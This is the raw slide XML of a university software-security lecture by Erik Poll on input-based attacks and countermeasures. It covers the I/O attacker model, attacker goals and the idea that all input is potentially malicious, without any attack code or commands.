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578" r:id="rId3"/>
    <p:sldId id="560" r:id="rId4"/>
    <p:sldId id="555" r:id="rId5"/>
    <p:sldId id="574" r:id="rId6"/>
    <p:sldId id="657" r:id="rId7"/>
    <p:sldId id="654" r:id="rId8"/>
    <p:sldId id="655" r:id="rId9"/>
    <p:sldId id="656" r:id="rId10"/>
    <p:sldId id="645" r:id="rId11"/>
    <p:sldId id="569" r:id="rId12"/>
    <p:sldId id="647" r:id="rId13"/>
    <p:sldId id="648" r:id="rId14"/>
    <p:sldId id="649" r:id="rId15"/>
    <p:sldId id="650" r:id="rId16"/>
    <p:sldId id="651" r:id="rId17"/>
    <p:sldId id="572" r:id="rId18"/>
    <p:sldId id="557" r:id="rId19"/>
    <p:sldId id="629" r:id="rId20"/>
    <p:sldId id="630" r:id="rId21"/>
    <p:sldId id="576" r:id="rId22"/>
    <p:sldId id="577" r:id="rId23"/>
    <p:sldId id="562" r:id="rId24"/>
    <p:sldId id="573" r:id="rId25"/>
    <p:sldId id="561" r:id="rId26"/>
    <p:sldId id="564" r:id="rId27"/>
    <p:sldId id="565" r:id="rId28"/>
    <p:sldId id="566" r:id="rId29"/>
    <p:sldId id="567" r:id="rId30"/>
    <p:sldId id="579" r:id="rId31"/>
    <p:sldId id="631" r:id="rId32"/>
    <p:sldId id="580" r:id="rId33"/>
    <p:sldId id="653" r:id="rId34"/>
    <p:sldId id="581" r:id="rId35"/>
    <p:sldId id="582" r:id="rId36"/>
    <p:sldId id="583" r:id="rId37"/>
    <p:sldId id="584" r:id="rId38"/>
    <p:sldId id="585" r:id="rId39"/>
    <p:sldId id="586" r:id="rId40"/>
    <p:sldId id="587" r:id="rId41"/>
    <p:sldId id="588" r:id="rId42"/>
    <p:sldId id="589" r:id="rId43"/>
    <p:sldId id="590" r:id="rId44"/>
    <p:sldId id="591" r:id="rId45"/>
    <p:sldId id="592" r:id="rId46"/>
    <p:sldId id="593" r:id="rId47"/>
    <p:sldId id="594" r:id="rId48"/>
    <p:sldId id="595" r:id="rId49"/>
    <p:sldId id="596" r:id="rId50"/>
    <p:sldId id="597" r:id="rId51"/>
    <p:sldId id="598" r:id="rId52"/>
    <p:sldId id="599" r:id="rId53"/>
    <p:sldId id="600" r:id="rId54"/>
    <p:sldId id="602" r:id="rId55"/>
    <p:sldId id="601" r:id="rId56"/>
    <p:sldId id="603" r:id="rId57"/>
    <p:sldId id="604" r:id="rId58"/>
    <p:sldId id="605" r:id="rId59"/>
    <p:sldId id="614" r:id="rId60"/>
    <p:sldId id="632" r:id="rId61"/>
    <p:sldId id="615" r:id="rId62"/>
    <p:sldId id="616" r:id="rId63"/>
    <p:sldId id="617" r:id="rId64"/>
    <p:sldId id="618" r:id="rId65"/>
    <p:sldId id="619" r:id="rId66"/>
    <p:sldId id="620" r:id="rId67"/>
    <p:sldId id="621" r:id="rId68"/>
    <p:sldId id="622" r:id="rId69"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="7010400" cy="92964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00"/>
    <a:srgbClr val="339933"/>
    <a:srgbClr val="000000"/>
    <a:srgbClr val="FF9900"/>
    <a:srgbClr val="FF6600"/>
    <a:srgbClr val="FFFFCC"/>
    <a:srgbClr val="FFCC00"/>
    <a:srgbClr val="FF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>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="70" d="100"/>
          <a:sy n="70" d="100"/>
        </p:scale>
        <p:origin x="1088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440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E8743D8D-B383-407E-B305-F734D40BF4E7}" type="datetimeFigureOut">
              <a:rPr lang="en-GB">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>18/10/2019</a:t>
            </a:fld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E91BD8FA-2A2B-4437-B358-28625BCFC453}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-N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20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2577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970338" y="0"/>
            <a:ext cx="3027362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9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33912" cy="3475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5938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8829675"/>
            <a:ext cx="302577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829675"/>
            <a:ext cx="3027362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A9B11392-17C7-43A2-9174-46EA27F88E07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4960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589B20-7DB5-40F7-9A4B-BD018678CE33}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"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nl-NL" dirty="0" smtClean="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34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92451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restrict the language, enforce this in the front-end? validate/sanatise inputs? or outputs?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marR="0" lvl="0" indent="0" algn="r" defTabSz="49212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/>
            </a:pPr>
            <a:fld id="{0C193197-7ADC-4513-B54D-02FD8E45085A}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US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pPr marL="0" marR="0" lvl="0" indent="0" algn="r" defTabSz="49212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1988" algn="l"/>
                  <a:tab pos="1323975" algn="l"/>
                  <a:tab pos="1985963" algn="l"/>
                  <a:tab pos="2647950" algn="l"/>
                </a:tabLst>
                <a:defRPr/>
              </a:pPr>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="nl-NL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2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restrict the language, enforce this in the front-end? validate/sanatise inputs? or outputs?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marR="0" lvl="0" indent="0" algn="r" defTabSz="49212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/>
            </a:pPr>
            <a:fld id="{0C193197-7ADC-4513-B54D-02FD8E45085A}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US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pPr marL="0" marR="0" lvl="0" indent="0" algn="r" defTabSz="49212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1988" algn="l"/>
                  <a:tab pos="1323975" algn="l"/>
                  <a:tab pos="1985963" algn="l"/>
                  <a:tab pos="2647950" algn="l"/>
                </a:tabLst>
                <a:defRPr/>
              </a:pPr>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="nl-NL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0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A5A288-02E4-42F5-A645-5F7284397B2E}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL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402726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D7D753-C99B-4E75-90FE-81941CAA4172}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"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63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0" smtClean="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204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89450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FA6353-0071-48A5-95A7-A0A9339EB228}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"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66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0" smtClean="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34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93618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A022D-6612-40C3-8F73-4FE84000F395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1406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74863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3803650" cy="4816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68760"/>
            <a:ext cx="3805238" cy="4816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F61A-0238-41AE-BB0B-6E00DBB90FAC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56549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C230-21FF-44A4-9AAD-1C1D30A8417D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3590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24446-1146-492B-891B-4917982AD882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16140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61288" cy="1008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98673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8" y="260648"/>
            <a:ext cx="7761288" cy="1008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7761288" cy="2304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17033"/>
            <a:ext cx="7761288" cy="23678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210F-E187-462D-9A5A-A06FF233235A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2224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6225"/>
            <a:ext cx="7761288" cy="8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4745"/>
            <a:ext cx="7761288" cy="496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smtClean="0"/>
              <a:t>Click to edit the outline text format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Second Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Third Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Fourth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Seventh Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Eighth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0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627313" y="6237288"/>
            <a:ext cx="3960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290586BA-BC27-4D33-B03C-01CAD134E49D}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹nr.›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2pPr>
      <a:lvl3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3pPr>
      <a:lvl4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4pPr>
      <a:lvl5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5pPr>
      <a:lvl6pPr marL="25146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6pPr>
      <a:lvl7pPr marL="29718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7pPr>
      <a:lvl8pPr marL="34290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8pPr>
      <a:lvl9pPr marL="38862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9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342900" indent="-34290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2pPr>
      <a:lvl3pPr marL="1143000" indent="-22860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3pPr>
      <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="492125" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0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4pPr>
      <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="492125" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0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5pPr>
      <a:lvl6pPr marL="25146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38" y="1214438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nl-NL" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Software Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="2000" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0" smtClean="0"/>
              <a:t>More standard </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0" smtClean="0"/>
              <a:t>(input) security problems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3600" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>&amp; countermeasures  </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="200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3505200"/>
            <a:ext cx="6400800" cy="2778125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 smtClean="0">
              <a:solidFill>
                <a:srgbClr val="009900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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Erik Poll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2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Digital Security group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2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Radboud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="2000" dirty="0" smtClean="0"/>
              <a:t> University Nijmegen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3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sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr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 smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr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 smtClean="0"/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445125"/>
            <a:ext cx="24193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74688" y="1345364"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="6000" baseline="-25000" dirty="0" smtClean="0">
                <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" smtClean="0"/>
              <a:t> problems</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3600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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 5" descr="C:\Users\erikpoll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01008"/>
            <a:ext cx="559794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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>eneral observations on these attacks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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>many</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  ways to attack with malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" baseline="-25000" dirty="0" smtClean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endParaRPr lang="en-GB" sz="1800" baseline="-25000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> input is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dangerous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" b="1" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>potentially</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="nl-NL" sz="1800" b="1" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="nl-NL" sz="1800" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Some attacks are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>specific to a particular technology  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>used in an application (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> SQL, HTML, the OS, …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>As defender you have to know these generic attacks for any technologies that you use!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>The attacks are often </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not specific to a particular application:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>hey are irrespective of any special security requirements for that application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>so even without knowing the exact security requirements, we can already start worrying about defending against these attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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11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815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I/O attacker model (‘hacking’)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US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endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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Aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>end point attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, as opposed to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MitM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="008000"/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en-GB" sz="1800" i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GB" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker goals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" i="1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en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, information leakage, remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execution (RCE), or anything in between</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty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en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.  compromising integrity &amp; availability of the application’s behaviour in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pP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 Poll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EC4CC29-862B-4EA9-AF42-0253A3CD0F2E}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Afgeronde rechthoek 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5431680" y="1181161"/>
            <a:ext cx="1560960" cy="1308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14" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2177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295" name="Picture 2" descr="C:\Users\erikpoll\Desktop\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41" y="1359721"/>
            <a:ext cx="882720" cy="88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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2226240" y="1454760"/>
            <a:ext cx="2810880" cy="2995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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12297" name="TextBox 36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2358721" y="1182601"/>
            <a:ext cx="1545120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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1814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4" name="Explosie 2 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5980321" y="1827721"/>
            <a:ext cx="1104480" cy="570240"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2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0" name="Curved Down Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5863680" y="1593001"/>
            <a:ext cx="789120" cy="486720"/>
          </a:xfrm>
          <a:prstGeom prst="curvedDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 67231"/>
              <a:gd name="adj3" fmla="val 2744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solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2115361" y="1817640"/>
            <a:ext cx="2845440" cy="259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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12301" name="TextBox 36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3519361" y="1238760"/>
            <a:ext cx="1110240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endParaRPr lang="en-GB" altLang="en-US" sz="1814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12302" name="TextBox 36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3326913" y="2075663"/>
            <a:ext cx="707040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 dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I/O</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1814" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Pieces NF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6225"/>
            <a:ext cx="6118448" cy="845345"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Dangers of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Faced with an I/O attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800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800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        Garbage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In, Garbage Out  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>                                                                                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="18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800" dirty="0" smtClean="0"/>
              <a:t>becomes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800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       Malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Garbage In</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Security Incident  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
